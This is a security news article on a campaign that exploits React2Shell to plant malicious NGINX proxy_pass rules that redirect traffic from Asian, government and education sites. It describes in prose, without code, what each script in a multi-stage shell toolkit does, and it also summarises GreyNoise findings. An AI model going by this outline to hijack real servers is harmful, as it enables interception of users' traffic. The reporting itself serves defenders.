Hackers are exploiting the React2Shell flaw to inject malicious NGINX configs and hijack web traffic via attacker-controlled servers.
Security researchers have uncovered an ongoing web traffic hijacking campaign targeting NGINX servers and popular hosting control panels such as Baota (BT), with the goal of rerouting legitimate traffic through attacker-controlled infrastructure.
Datadog Security Labs reported that the activity is linked to exploitation of the critical React2Shell vulnerability. The attackers abuse malicious NGINX configuration files to intercept requests and proxy them to backend systems under their control.
“The malicious configuration sits between users and legitimate websites, silently redirecting traffic,” said security researcher Ryan Simon. “The campaign primarily targets Asian country-code TLDs like .in, .id, .pe, .bd, and .th, Baota-managed Chinese hosting environments, and government and education domains such as .gov and .edu.”
The attack relies on shell scripts that inject rogue “location” blocks into NGINX, an open-source reverse proxy and load balancer. These directives capture requests sent to specific URL paths and forward them to attacker-owned domains using the proxy_pass feature.
Researchers noted that the scripts form a multi-stage toolkit designed to establish persistence and automate the deployment of malicious NGINX configurations. Key components include:
zx.sh, the main controller, which executes later stages using tools like curl or wget, or falls back to raw TCP connections if those utilities are blocked
bt.sh, which specifically targets Baota (BT) Panel environments to overwrite NGINX configuration files
4zdh.sh, which scans common NGINX config paths and reduces errors during file creation
zdh.sh, which focuses on Linux and containerized NGINX deployments, particularly those serving .in and .id domains
ok.sh, which generates reports listing all active traffic hijacking rules on the system
“The toolkit combines target discovery, persistence mechanisms, and automated creation of malicious configuration files to sustain traffic redirection,” Datadog said.
The findings follow a GreyNoise report showing that just two IP addresses were responsible for 56% of observed React2Shell exploitation attempts two months after the vulnerability’s disclosure. Between January 26 and February 2, 2026, GreyNoise recorded exploitation activity from 1,083 unique source IPs.
According to the threat intelligence firm, the most active sources deployed different post-exploitation payloads. One delivered cryptomining software from staging servers, while the other established reverse shells back to the scanning IPs, indicating a preference for hands-on access over automated monetization.
The disclosure also comes amid a separate coordinated reconnaissance effort targeting Citrix ADC and NetScaler Gateway systems. That campaign leveraged tens of thousands of residential proxy IPs alongside a single Microsoft Azure address to identify exposed login interfaces.
“The operation ran in two modes,” GreyNoise said. “One used large-scale proxy rotation to discover login panels, while the other focused on rapid version enumeration from cloud infrastructure. Together, they point to a highly coordinated reconnaissance effort.”
Reports are sourced from official documents, law-enforcement updates, and credible investigations.
Discover additional reports, market trends, crime analysis and Harm Reduction articles on DarkDotWeb to stay informed about the latest dark web operations.
